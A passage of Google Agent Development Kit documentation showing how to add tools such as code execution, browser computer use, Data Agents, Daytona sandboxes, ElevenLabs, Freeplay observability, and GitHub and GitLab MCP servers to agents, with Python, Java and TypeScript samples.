allows the model to perform tasks like calculations, data manipulation, or running small scripts. Warning: Single tool per agent limitation This tool can only be used ***by itself*** within an agent instance. For more information about this limitation and workarounds, see [Limitations for ADK tools](/adk-docs/tools/limitations/#one-tool-one-agent). ````py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio from google.adk.agents import LlmAgent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.code_executors import BuiltInCodeExecutor from google.genai import types AGENT_NAME = "calculator_agent" APP_NAME = "calculator" USER_ID = "user1234" SESSION_ID = "session_code_exec_async" GEMINI_MODEL = "gemini-2.0-flash" # Agent Definition code_agent = LlmAgent( name=AGENT_NAME, model=GEMINI_MODEL, code_executor=BuiltInCodeExecutor(), instruction="""You are a calculator agent. When given a mathematical expression, write and execute Python code to calculate the result. Return only the final numerical result as plain text, without markdown or code blocks. """, description="Executes Python code to perform calculations.", ) # Session and Runner session_service = InMemorySessionService() session = asyncio.run(session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID )) runner = Runner(agent=code_agent, app_name=APP_NAME, session_service=session_service) # Agent Interaction (Async) async def call_agent_async(query): content = types.Content(role="user", parts=[types.Part(text=query)]) print(f"\n--- Running Query: {query} ---") final_response_text = "No final text response captured." try: # Use run_async async for event in runner.run_async( user_id=USER_ID, session_id=SESSION_ID, new_message=content ): print(f"Event ID: {event.id}, Author: {event.author}") # --- Check for specific parts FIRST --- has_specific_part = False if event.content and event.content.parts: for part in event.content.parts: # Iterate through all parts if part.executable_code: # Access the actual code string via .code print( f" Debug: Agent generated code:\n```python\n{part.executable_code.code}\n```" ) has_specific_part = True elif part.code_execution_result: # Access outcome and output correctly print( f" Debug: Code Execution Result: {part.code_execution_result.outcome} - Output:\n{part.code_execution_result.output}" ) has_specific_part = True # Also print any text parts found in any event for debugging elif part.text and not part.text.isspace(): print(f" Text: '{part.text.strip()}'") # Do not set has_specific_part=True here, as we want the final response logic below # --- Check for final response AFTER specific parts --- # Only consider it final if it doesn't have the specific code parts we just handled if not has_specific_part and event.is_final_response(): if ( event.content and event.content.parts and event.content.parts[0].text ): final_response_text = event.content.parts[0].text.strip() print(f"==> Final Agent Response: {final_response_text}") else: print( "==> Final Agent Response: [No text content in final event]") except Exception as e: print(f"ERROR during agent run: {e}") print("-" * 30) # Main async function to run the examples async def main(): await call_agent_async("Calculate the value of (5 + 7) * 3") await call_agent_async("What is 10 factorial?") # Execute the main async function try: asyncio.run(main()) except RuntimeError as e: # Handle specific error when running asyncio.run in an already running loop (like Jupyter/Colab) if "cannot be called from a running event loop" in str(e): print("\nRunning in an existing event loop (like Colab/Jupyter).") print("Please run `await main()` in a notebook cell instead.") # If in an interactive environment like a notebook, you might need to run: # await main() else: raise e # Re-raise other runtime errors ```` ````java import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import com.google.adk.tools.BuiltInCodeExecutionTool; import com.google.common.collect.ImmutableList; import com.google.genai.types.Content; import com.google.genai.types.Part; public class CodeExecutionAgentApp { private static final String AGENT_NAME = "calculator_agent"; private static final String APP_NAME = "calculator"; private static final String USER_ID = "user1234"; private static final String SESSION_ID = "session_code_exec_sync"; private static final String GEMINI_MODEL = "gemini-2.0-flash"; /** * Calls the agent with a query and prints the interaction events and final response. * * @param runner The runner instance for the agent. * @param query The query to send to the agent. */ public static void callAgent(Runner runner, String query) { Content content = Content.builder().role("user").parts(ImmutableList.of(Part.fromText(query))).build(); InMemorySessionService sessionService = (InMemorySessionService) runner.sessionService(); Session session = sessionService .createSession(APP_NAME, USER_ID, /* state= */ null, SESSION_ID) .blockingGet(); System.out.println("\n--- Running Query: " + query + " ---"); final String[] finalResponseText = {"No final text response captured."}; try { runner .runAsync(session.userId(), session.id(), content) .forEach( event -> { System.out.println("Event ID: " + event.id() + ", Author: " + event.author()); boolean hasSpecificPart = false; if (event.content().isPresent() && event.content().get().parts().isPresent()) { for (Part part : event.content().get().parts().get()) { if (part.executableCode().isPresent()) { System.out.println( " Debug: Agent generated code:\n```python\n" + part.executableCode().get().code() + "\n```"); hasSpecificPart = true; } else if (part.codeExecutionResult().isPresent()) { System.out.println( " Debug: Code Execution Result: " + part.codeExecutionResult().get().outcome() + " - Output:\n" + part.codeExecutionResult().get().output()); hasSpecificPart = true; } else if (part.text().isPresent() && !part.text().get().trim().isEmpty()) { System.out.println(" Text: '" + part.text().get().trim() + "'"); } } } if (!hasSpecificPart && event.finalResponse()) { if (event.content().isPresent() && event.content().get().parts().isPresent() && !event.content().get().parts().get().isEmpty() && event.content().get().parts().get().get(0).text().isPresent()) { finalResponseText[0] = event.content().get().parts().get().get(0).text().get().trim(); System.out.println("==> Final Agent Response: " + finalResponseText[0]); } else { System.out.println( "==> Final Agent Response: [No text content in final event]"); } } }); } catch (Exception e) { System.err.println("ERROR during agent run: " + e.getMessage()); e.printStackTrace(); } System.out.println("------------------------------"); } public static void main(String[] args) { BuiltInCodeExecutionTool codeExecutionTool = new BuiltInCodeExecutionTool(); BaseAgent codeAgent = LlmAgent.builder() .name(AGENT_NAME) .model(GEMINI_MODEL) .tools(ImmutableList.of(codeExecutionTool)) .instruction( """ You are a calculator agent. When given a mathematical expression, write and execute Python code to calculate the result. Return only the final numerical result as plain text, without markdown or code blocks. """) .description("Executes Python code to perform calculations.") .build(); InMemorySessionService sessionService = new InMemorySessionService(); Runner runner = new Runner(codeAgent, APP_NAME, null, sessionService); callAgent(runner, "Calculate the value of (5 + 7) * 3"); callAgent(runner, "What is 10 factorial?"); } } ```` # Gemini API Computer Use tool for ADK Supported in ADKPython v1.17.0Preview The Computer Use Toolset allows an agent to operate a user interface of a computer, such as browsers, to complete tasks. This tool uses a specific Gemini model and the [Playwright](https://playwright.dev/) testing tool to control a Chromium browser and can interact with web pages by taking screenshots, clicking, typing, and navigating. For more information about the computer use model, see Gemini API [Computer use](https://ai.google.dev/gemini-api/docs/computer-use) or the Google Cloud Vertex AI API [Computer use](https://cloud.google.com/vertex-ai/generative-ai/docs/computer-use). Preview release The Computer Use model and tool is a Preview release. For more information, see the [launch stage descriptions](https://cloud.google.com/products#product-launch-stages). ## Setup You must install Playwright and its dependencies, including Chromium, to be able to use the Computer Use Toolset. Recommended: create and activate a Python virtual environment Create a Python virtual environment: ```shell python -m venv .venv ``` Activate the Python virtual environment: ```console .venv\Scripts\activate.bat ``` ```console .venv\Scripts\Activate.ps1 ``` ```bash source .venv/bin/activate ``` To set up the required software libraries for the Computer Use Toolset: 1. Install Python dependencies: ```console pip install termcolor==3.1.0 pip install playwright==1.52.0 pip install browserbase==1.3.0 pip install rich ``` 1. Install the Playwright dependencies, including the Chromium browser: ```console playwright install-deps chromium playwright install chromium ``` ## Use the tool Use the Computer Use Toolset by adding it as a tool to your agent. When you configure the tool, you must provide a implementation of the `BaseComputer` class which defines an interface for an agent to use a computer. In the following example, the `PlaywrightComputer` class is defined for this purpose. You can find the code for this implementation in `playwright.py` file of the [computer_use](https://github.com/google/adk-python/blob/main/contributing/samples/computer_use/playwright.py) agent sample project. ```python from google.adk import Agent from google.adk.models.google_llm import Gemini from google.adk.tools.computer_use.computer_use_toolset import ComputerUseToolset from typing_extensions import override from .playwright import PlaywrightComputer root_agent = Agent( model='gemini-2.5-computer-use-preview-10-2025', name='hello_world_agent', description=( 'computer use agent that can operate a browser on a computer to finish' ' user tasks' ), instruction='you are a computer use agent', tools=[ ComputerUseToolset(computer=PlaywrightComputer(screen_size=(1280, 936))) ], ) ``` For a complete code example, see the [computer_use](https://github.com/google/adk-python/tree/main/contributing/samples/computer_use) agent sample project. # Google Cloud Data Agents tool for ADK Supported in ADKPython v1.23.0 These are a set of tools aimed to provide integration with Data Agents powered by [Conversational Analytics API](https://docs.cloud.google.com/gemini/docs/conversational-analytics-api/overview). Data Agents are AI-powered agents that help you analyze your data using natural language. When configuring a Data Agent, you can choose from supported data sources, including **BigQuery**, **Looker**, and **Looker Studio**. **Prerequisites** Before using these tools, you must build and configure your Data Agents in Google Cloud: - [Build a data agent using HTTP and Python](https://docs.cloud.google.com/gemini/docs/conversational-analytics-api/build-agent-http) - [Build a data agent using the Python SDK](https://docs.cloud.google.com/gemini/docs/conversational-analytics-api/build-agent-sdk) - [Create a data agent in BigQuery Studio](https://docs.cloud.google.com/bigquery/docs/create-data-agents#create_a_data_agent) The `DataAgentToolset` includes the following tools: - **`list_accessible_data_agents`**: Lists Data Agents you have permission to access in the configured GCP project. - **`get_data_agent_info`**: Retrieves details about a specific Data Agent given its full resource name. - **`ask_data_agent`**: Chats with a specific Data Agent using natural language. They are packaged in the toolset `DataAgentToolset`. ```py # Copyright 2026 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio from google.adk.agents import Agent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.tools.data_agent.config import DataAgentToolConfig from google.adk.tools.data_agent.credentials import DataAgentCredentialsConfig from google.adk.tools.data_agent.data_agent_toolset import DataAgentToolset from google.genai import types import google.auth # Define constants for this example agent AGENT_NAME = "data_agent_example" APP_NAME = "data_agent_app" USER_ID = "user1234" SESSION_ID = "1234" GEMINI_MODEL = "gemini-2.5-flash" # Define tool configuration tool_config = DataAgentToolConfig( max_query_result_rows=100, ) # Use Application Default Credentials (ADC) # https://cloud.google.com/docs/authentication/provide-credentials-adc application_default_credentials, _ = google.auth.default() credentials_config = DataAgentCredentialsConfig( credentials=application_default_credentials ) # Instantiate a Data Agent toolset da_toolset = DataAgentToolset( credentials_config=credentials_config, data_agent_tool_config=tool_config, tool_filter=[ "list_accessible_data_agents", "get_data_agent_info", "ask_data_agent", ], ) # Agent Definition data_agent = Agent( name=AGENT_NAME, model=GEMINI_MODEL, description="Agent to answer user questions using Data Agents.", instruction=( "## Persona\nYou are a helpful assistant that uses Data Agents" " to answer user questions about their data.\n\n" ), tools=[da_toolset], ) # Session and Runner session_service = InMemorySessionService() session = asyncio.run( session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID ) ) runner = Runner( agent=data_agent, app_name=APP_NAME, session_service=session_service ) # Agent Interaction def call_agent(query): """ Helper function to call the agent with a query. """ content = types.Content(role="user", parts=[types.Part(text=query)]) events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content) print("USER:", query) for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("AGENT:", final_response) call_agent("List accessible data agents in project .") call_agent("Get information about .") # The data agent in this example is configured with the BigQuery table: # `bigquery-public-data.san_francisco.street_trees` call_agent("Ask to count the rows in the table.") call_agent("What are the columns in the table?") call_agent("What are the top 5 tree species?") call_agent("For those species, what is the distribution of legal status?") ``` # Daytona plugin for ADK Supported in ADKPython The [Daytona ADK plugin](https://github.com/daytonaio/daytona-adk-plugin) connects your ADK agent to [Daytona](https://www.daytona.io/) sandboxes. This integration gives your agent the ability to execute code, run shell commands, and manage files in isolated environments, enabling secure execution of AI-generated code. ## Use cases - **Secure Code Execution**: Run Python, JavaScript, and TypeScript code in isolated sandboxes without risking your local environment. - **Shell Command Automation**: Execute shell commands with configurable timeouts and working directories for build tasks, installations, or system operations. - **File Management**: Upload scripts and datasets to sandboxes, then retrieve generated outputs and results. ## Prerequisites - A [Daytona](https://www.daytona.io/) account - Daytona API key ## Installation ```bash pip install daytona-adk ``` ## Use with agent ```python from daytona_adk import DaytonaPlugin from google.adk.agents import Agent plugin = DaytonaPlugin( api_key="your-daytona-api-key" # Or set DAYTONA_API_KEY environment variable ) root_agent = Agent( model="gemini-2.5-pro", name="sandbox_agent", instruction="Help users execute code and commands in a secure sandbox", tools=plugin.get_tools(), ) ``` ## Available tools | Tool | Description | | ------------------------------------ | ---------------------------------------------- | | `execute_code_in_daytona` | Execute Python, JavaScript, or TypeScript code | | `execute_command_in_daytona` | Run shell commands | | `upload_file_to_daytona` | Upload scripts or data files to the sandbox | | `read_file_from_daytona` | Read script outputs or generated files | | `start_long_running_command_daytona` | Start background processes (servers, watchers) | ## Learn more For a detailed guide on building a code generator agent that writes, tests, and verifies code in secure sandboxes, check out [this guide](https://www.daytona.io/docs/en/google-adk-code-generator). ## Additional resources - [Code Generator Agent Guide](https://www.daytona.io/docs/en/google-adk-code-generator) - [Daytona ADK on PyPI](https://pypi.org/project/daytona-adk/) - [Daytona ADK on GitHub](https://github.com/daytonaio/daytona-adk-plugin) - [Daytona Documentation](https://www.daytona.io/docs) # ElevenLabs MCP tool for ADK Supported in ADKPythonTypeScript The [ElevenLabs MCP Server](https://github.com/elevenlabs/elevenlabs-mcp) connects your ADK agent to the [ElevenLabs](https://elevenlabs.io/) AI audio platform. This integration gives your agent the ability to generate speech, clone voices, transcribe audio, create sound effects, and build conversational AI experiences using natural language. ## Use cases - **Text-to-Speech Generation**: Convert text into natural-sounding speech using a variety of voices, with fine-grained control over stability, style, and similarity settings. - **Voice Cloning & Design**: Clone voices from audio samples or generate new voices from text descriptions of desired characteristics like age, gender, accent, and tone. - **Audio Processing**: Isolate speech from background noise, convert audio to sound like different voices, or transcribe speech to text with speaker identification. - **Sound Effects & Soundscapes**: Generate sound effects and ambient soundscapes from text descriptions, such as "a thunderstorm in a dense jungle with animals reacting to the weather." ## Prerequisites - Sign up for an [ElevenLabs account](https://elevenlabs.io/app/sign-up) - Generate an [API key](https://elevenlabs.io/app/settings/api-keys) from your account settings ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters ELEVENLABS_API_KEY = "YOUR_ELEVENLABS_API_KEY" root_agent = Agent( model="gemini-2.5-pro", name="elevenlabs_agent", instruction="Help users generate speech, clone voices, and process audio", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="uvx", args=["elevenlabs-mcp"], env={ "ELEVENLABS_API_KEY": ELEVENLABS_API_KEY, } ), timeout=30, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const ELEVENLABS_API_KEY = "YOUR_ELEVENLABS_API_KEY"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "elevenlabs_agent", instruction: "Help users generate speech, clone voices, and process audio", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "uvx", args: ["elevenlabs-mcp"], env: { ELEVENLABS_API_KEY: ELEVENLABS_API_KEY, }, }, }), ], }); export { rootAgent }; ``` ## Available tools ### Text-to-speech and voice | Tool | Description | | --------------------------- | ------------------------------------------------- | | `text_to_speech` | Generate speech from text using a specified voice | | `speech_to_speech` | Transform audio to sound like a different voice | | `text_to_voice` | Generate a voice preview from text description | | `create_voice_from_preview` | Save a generated voice preview to your library | | `voice_clone` | Clone a voice from audio samples | | `get_voice` | Get details about a specific voice | | `search_voices` | Search for voices in your library | | `search_voice_library` | Search the public voice library | | `list_models` | List available text-to-speech models | ### Audio processing | Tool | Description | | ------------------------- | ---------------------------------------------------- | | `speech_to_text` | Transcribe audio to text with speaker identification | | `text_to_sound_effects` | Generate sound effects from text descriptions | | `isolate_audio` | Separate speech from background noise and music | | `play_audio` | Play an audio file locally | | `compose_music` | Generate music from a description | | `create_composition_plan` | Create a plan for music composition | ### Conversational AI | Tool | Description | | ----------------------------- | ---------------------------------------------- | | `create_agent` | Create a conversational AI agent | | `get_agent` | Get details about a specific agent | | `list_agents` | List all your conversational AI agents | | `add_knowledge_base_to_agent` | Add a knowledge base to an agent | | `make_outbound_call` | Initiate an outbound phone call using an agent | | `list_phone_numbers` | List available phone numbers | | `get_conversation` | Get details about a specific conversation | | `list_conversations` | List all conversations | ### Account | Tool | Description | | -------------------- | ---------------------------------------- | | `check_subscription` | Check your subscription and credit usage | ## Configuration The ElevenLabs MCP server can be configured using environment variables: | Variable | Description | Default | | ---------------------------- | --------------------------------------- | ----------- | | `ELEVENLABS_API_KEY` | Your ElevenLabs API key | Required | | `ELEVENLABS_MCP_BASE_PATH` | Base path for file operations | `~/Desktop` | | `ELEVENLABS_MCP_OUTPUT_MODE` | How generated files are returned | `files` | | `ELEVENLABS_API_RESIDENCY` | Data residency region (enterprise only) | `us` | ### Output modes The `ELEVENLABS_MCP_OUTPUT_MODE` environment variable supports three modes: - **`files`** (default): Save files to disk and return file paths - **`resources`**: Return files as MCP resources (base64-encoded binary data) - **`both`**: Save files to disk AND return as MCP resources ## Additional resources - [ElevenLabs MCP Server Repository](https://github.com/elevenlabs/elevenlabs-mcp) - [Introducing ElevenLabs MCP](https://elevenlabs.io/blog/introducing-elevenlabs-mcp) - [ElevenLabs Documentation](https://elevenlabs.io/docs) # Google Cloud Vertex AI express mode for ADK Supported in ADKPython v0.1.0Java v0.1.0Preview Google Cloud Vertex AI express mode provides a no-cost access tier for prototyping and development, allowing you to use Vertex AI services without creating a full Google Cloud Project. This service includes access to many powerful Vertex AI services, including: - [Vertex AI SessionService](#vertex-ai-session-service) - [Vertex AI MemoryBankService](#vertex-ai-memory-bank) You can sign up for an express mode account using a Gmail account and receive an API key to use with the ADK. Obtain an API key through the [Google Cloud Console](https://console.cloud.google.com/expressmode). For more information, see [Vertex AI express mode](https://cloud.google.com/vertex-ai/generative-ai/docs/start/express-mode/overview). Preview release The Vertex AI express mode feature is a Preview release. For more information, see the [launch stage descriptions](https://cloud.google.com/products#product-launch-stages). Vertex AI express mode limitations Vertex AI express mode projects are only valid for 90 days and only select services are available to be used with limited quota. For example, the number of Agent Engines is restricted to 10 and deployment to Agent Engine requires paid access. To remove the quota restrictions and use all of Vertex AI's services, add a billing account to your express mode project. ## Configure Agent Engine container When using Vertex AI express mode, create an `AgentEngine` object to enable Vertex AI management of agent components such as `Session` and `Memory` objects. With this approach, `Session` objects are handled as children of the `AgentEngine` object. Before running your agent make sure your environment variables are set correctly, as shown below: agent/.env ```text GOOGLE_GENAI_USE_VERTEXAI=TRUE GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_EXPRESS_MODE_API_KEY_HERE ``` Next, create your Agent Engine instance using the Vertex AI SDK. 1. Import Vertex AI SDK. ```py import vertexai from vertexai import agent_engines ``` 1. Initialize the Vertex AI Client with your API key and create an agent engine instance. ```py # Create Agent Engine with Gen AI SDK client = vertexai.Client( api_key="YOUR_API_KEY", ) agent_engine = client.agent_engines.create( config={ "display_name": "Demo Agent Engine", "description": "Agent Engine for Session and Memory", }) ``` 1. Get the Agent Engine name and ID from the response to use with Memories and Sessions. ```py APP_ID = agent_engine.api_resource.name.split('/')[-1] ``` ## Manage Sessions with `VertexAiSessionService` [`VertexAiSessionService`](/adk-docs/sessions/session.md#sessionservice-implementations) is compatible with Vertex AI express mode API Keys. You can instead initialize the session object without any project or location. ```py # Requires: pip install google-adk[vertexai] # Plus environment variable setup: # GOOGLE_GENAI_USE_VERTEXAI=TRUE # GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_EXPRESS_MODE_API_KEY_HERE from google.adk.sessions import VertexAiSessionService # The app_name used with this service should be the Reasoning Engine ID or name APP_ID = "your-reasoning-engine-id" # Project and location are not required when initializing with Vertex express mode session_service = VertexAiSessionService(agent_engine_id=APP_ID) # Use REASONING_ENGINE_APP_ID when calling service methods, e.g.: # session = await session_service.create_session(app_name=APP_ID, user_id= ...) ``` Session Service Quotas For Free express mode Projects, `VertexAiSessionService` has the following quota: - 10 Create, delete, or update Vertex AI Agent Engine sessions per minute - 30 Append event to Vertex AI Agent Engine sessions per minute ## Manage Memory with `VertexAiMemoryBankService` [`VertexAiMemoryBankService`](/adk-docs/sessions/memory.md#vertex-ai-memory-bank) is compatible with Vertex AI express mode API Keys. You can instead initialize the memory object without any project or location. ```py # Requires: pip install google-adk[vertexai] # Plus environment variable setup: # GOOGLE_GENAI_USE_VERTEXAI=TRUE # GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_EXPRESS_MODE_API_KEY_HERE from google.adk.memory import VertexAiMemoryBankService # The app_name used with this service should be the Reasoning Engine ID or name APP_ID = "your-reasoning-engine-id" # Project and location are not required when initializing with express mode memory_service = VertexAiMemoryBankService(agent_engine_id=APP_ID) # Generate a memory from that session so the Agent can remember relevant details about the user # memory = await memory_service.add_session_to_memory(session) ``` Memory Service Quotas For Free express mode Projects, `VertexAiMemoryBankService` has the following quota: - 10 Create, delete, or update Vertex AI Agent Engine memory resources per minute - 10 Get, list, or retrieve from Vertex AI Agent Engine Memory Bank per minute ### Code Sample: Weather Agent with Session and Memory This code sample shows a weather agent that utilizes both `VertexAiSessionService` and `VertexAiMemoryBankService` for context management, allowing your agent to recall user preferences and conversations. - [Weather Agent with Session and Memory](https://github.com/google/adk-docs/blob/main/examples/python/notebooks/express-mode-weather-agent.ipynb) using Vertex AI express mode # Freeplay observability for ADK Supported in ADKPython [Freeplay](https://freeplay.ai/) provides an end-to-end workflow for building and optimizing AI agents, and it can be integrated with ADK. With Freeplay your whole team can easily collaborate to iterate on agent instructions (prompts), experiment with and compare different models and agent changes, run evals both offline and online to measure quality, monitor production, and review data by hand. Key benefits of Freeplay: - **Simple observability** - focused on agents, LLM calls and tool calls for easy human review - **Online evals/automated scorers** - for error detection in production - **Offline evals and experiment comparison** - to test changes before deploying - **Prompt management** - supports pushing changes straight from the Freeplay playground to code - **Human review workflow** - for collaboration on error analysis and data annotation - **Powerful UI** - makes it possible for domain experts to collaborate closely with engineers Freeplay and ADK complement one another. ADK gives you a powerful and expressive agent orchestration framework while Freeplay plugs in for observability, prompt management, evaluation and testing. Once you integrate with Freeplay, you can update prompts and evals from the Freeplay UI or from code, so that anyone on your team can contribute. ## Getting Started Below is a guide for getting started with Freeplay and ADK. You can also find a full sample ADK agent repo [here](https://github.com/228Labs/freeplay-google-demo). ### Create a Freeplay Account Sign up for a free [Freeplay account](https://freeplay.ai/signup). After creating an account, you can define the following environment variables: ```text FREEPLAY_PROJECT_ID= FREEPLAY_API_KEY= FREEPLAY_API_URL= ``` ### Use Freeplay ADK Library Install the Freeplay ADK library: ```text pip install freeplay-python-adk ``` Freeplay will automatically capture OTel logs from your ADK application when you initialize observability: ```python from freeplay_python_adk.client import FreeplayADK FreeplayADK.initialize_observability() ``` You'll also want to pass in the Freeplay plugin to your App: ```python from app.agent import root_agent from freeplay_python_adk.freeplay_observability_plugin import FreeplayObservabilityPlugin from google.adk.runners import App app = App( name="app", root_agent=root_agent, plugins=[FreeplayObservabilityPlugin()], ) __all__ = ["app"] ``` You can now use ADK as you normally would, and you will see logs flowing to Freeplay in the Observability section. ## Observability Freeplay's Observability feature gives you a clear view into how your agent is behaving in production. You can dig into individual agent traces to understand each step and diagnose issues: You can also use Freeplay's filtering functionality to search and filter the data across any segment of interest: ## Prompt Management (optional) Freeplay offers [native prompt management](https://docs.freeplay.ai/docs/managing-prompts), which simplifies the process of version and testing different prompt versions. It allows you to experiment with changes to ADK agent instructions in the Freeplay UI, test different models, and push updates straight to your code, similar to a feature flag. To leverage Freeplay's prompt management capabilities alongside ADK, you'll want to use the Freeplay ADK agent wrapper. `FreeplayLLMAgent` extends ADK's base `LlmAgent` class, so instead of having to hard code your prompts as agent instructions, you can version prompts in the Freeplay application. First define a prompt in Freeplay by going to Prompts -> Create prompt template: When creating your prompt template you'll need to add 3 elements, as described in the following sections: ### System Message This corresponds to the "instructions" section in your code. ### Agent Context Variable Adding the following to the bottom of your system message will create a variable for the ongoing agent context to be passed through: ```python {{agent_context}} ``` ### History Block Click new message and change the role to 'history'. This will ensure the past messages are passed through when present. Now in your code you can use the `FreeplayLLMAgent`: ```python from freeplay_python_adk.client import FreeplayADK from freeplay_python_adk.freeplay_llm_agent import ( FreeplayLLMAgent, ) FreeplayADK.initialize_observability() root_agent = FreeplayLLMAgent( name="social_product_researcher", tools=[tavily_search], ) ``` When the `social_product_researcher` is invoked, the prompt will be retrieved from Freeplay and formatted with the proper input variables. ## Evaluation Freeplay enables you to define, version, and run [evaluations](https://docs.freeplay.ai/docs/evaluations) from the Freeplay web application. You can define evaluations for any of your prompts or agents by going to Evaluations -> "New evaluation". These evaluations can be configured to run for both online monitoring and offline evaluation. Datasets for offline evaluation can be uploaded to Freeplay or saved from log examples. ## Dataset Management As you get data flowing into Freeplay, you can use these logs to start building up [datasets](https://docs.freeplay.ai/docs/datasets) to test against on a repeated basis. Use production logs to create golden datasets or collections of failure cases that you can use to test against as you make changes. ## Batch Testing As you iterate on your agent, you can run batch tests (i.e., offline experiments) at both the [prompt](https://docs.freeplay.ai/docs/component-level-test-runs) and [end-to-end](https://docs.freeplay.ai/docs/end-to-end-test-runs) agent level. This allows you to compare multiple different models or prompt changes and quantify changes head to head across your full agent execution. [Here](https://github.com/freeplayai/freeplay-google-demo/blob/main/examples/example_test_run.py) is a code example for executing a batch test on Freeplay with ADK. ## Sign up now Go to [Freeplay](https://freeplay.ai/) to sign up for an account, and check out a full Freeplay \<> ADK Integration [here](https://github.com/freeplayai/freeplay-google-demo/tree/main) # GitHub MCP tool for ADK Supported in ADKPythonTypeScript The [GitHub MCP Server](https://github.com/github/github-mcp-server) connects AI tools directly to GitHub's platform. This gives your ADK agent the ability to read repositories and code files, manage issues and PRs, analyze code, and automate workflows using natural language. ## Use cases - **Repository Management**: Browse and query code, search files, analyze commits, and understand project structure across any repository you have access to. - **Issue & PR Automation**: Create, update, and manage issues and pull requests. Let AI help triage bugs, review code changes, and maintain project boards. - **Code Analysis**: Examine security findings, review Dependabot alerts, understand code patterns, and get comprehensive insights into your codebase. ## Prerequisites - Create a [Personal Access Token](https://github.com/settings/personal-access-tokens/new) in GitHub. Refer to the [documentation](https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/managing-your-personal-access-tokens) for more information. ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StreamableHTTPServerParams GITHUB_TOKEN = "YOUR_GITHUB_TOKEN" root_agent = Agent( model="gemini-2.5-pro", name="github_agent", instruction="Help users get information from GitHub", tools=[ McpToolset( connection_params=StreamableHTTPServerParams( url="https://api.githubcopilot.com/mcp/", headers={ "Authorization": f"Bearer {GITHUB_TOKEN}", "X-MCP-Toolsets": "all", "X-MCP-Readonly": "true" }, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const GITHUB_TOKEN = "YOUR_GITHUB_TOKEN"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "github_agent", instruction: "Help users get information from GitHub", tools: [ new MCPToolset({ type: "StreamableHTTPConnectionParams", url: "https://api.githubcopilot.com/mcp/", header: { Authorization: `Bearer ${GITHUB_TOKEN}`, "X-MCP-Toolsets": "all", "X-MCP-Readonly": "true", }, }), ], }); export { rootAgent }; ``` ## Available tools | Tool | Description | | ---------------------------- | ----------------------------------------------------------------------------------------- | | `context` | Tools that provide context about the current user and GitHub context you are operating in | | `copilot` | Copilot related tools (e.g. Copilot Coding Agent) | | `copilot_spaces` | Copilot Spaces related tools | | `actions` | GitHub Actions workflows and CI/CD operations | | `code_security` | Code security related tools, such as GitHub Code Scanning | | `dependabot` | Dependabot tools | | `discussions` | GitHub Discussions related tools | | `experiments` | Experimental features that are not considered stable yet | | `gists` | GitHub Gist related tools | | `github_support_docs_search` | Search docs to answer GitHub product and support questions | | `issues` | GitHub Issues related tools | | `labels` | GitHub Labels related tools | | `notifications` | GitHub Notifications related tools | | `orgs` | GitHub Organization related tools | | `projects` | GitHub Projects related tools | | `pull_requests` | GitHub Pull Request related tools | | `repos` | GitHub Repository related tools | | `secret_protection` | Secret protection related tools, such as GitHub Secret Scanning | | `security_advisories` | Security advisories related tools | | `stargazers` | GitHub Stargazers related tools | | `users` | GitHub User related tools | ## Configuration The Remote GitHub MCP server has optional headers that can be used to configure available toolsets and read-only mode: - `X-MCP-Toolsets`: Comma-separated list of toolsets to enable. (e.g., "repos,issues") - If the list is empty, default toolsets will be used. If a bad toolset is provided, the server will fail to start and emit a 400 bad request status. Whitespace is ignored. - `X-MCP-Readonly`: Enables only "read" tools. - If this header is empty, "false", "f", "no", "n", "0", or "off" (ignoring whitespace and case), it will be interpreted as false. All other values are interpreted as true. ## Additional resources - [GitHub MCP Server Repository](https://github.com/github/github-mcp-server) - [Remote GitHub MCP Server Documentation](https://github.com/github/github-mcp-server/blob/main/docs/remote-server.md) - [Policies and Governance for the GitHub MCP Server](https://github.com/github/github-mcp-server/blob/main/docs/policies-and-governance.md) # GitLab MCP tool for ADK Supported in ADKPythonTypeScript The [GitLab MCP Server](https://docs.gitlab.com/user/gitlab_duo/model_context_protocol/mcp_server/) connects your ADK agent directly to [GitLab.com](https://gitlab.com/) or your self-managed GitLab instance. This integration gives your agent the ability to manage issues and merge requests, inspect CI/CD pipelines, perform semantic code searches, and automate development workflows using natural language. ## Use cases - **Semantic Code Exploration**: Navigate your codebase using natural language. Unlike standard text search, you can query the logic and intent of your code to quickly understand complex implementations. - **Accelerate Merge Request Reviews**: Get up to speed on code changes instantly. Retrieve full merge request contexts, analyze specific diffs, and review commit history to provide faster, more meaningful feedback to your team. - **Troubleshoot CI/CD 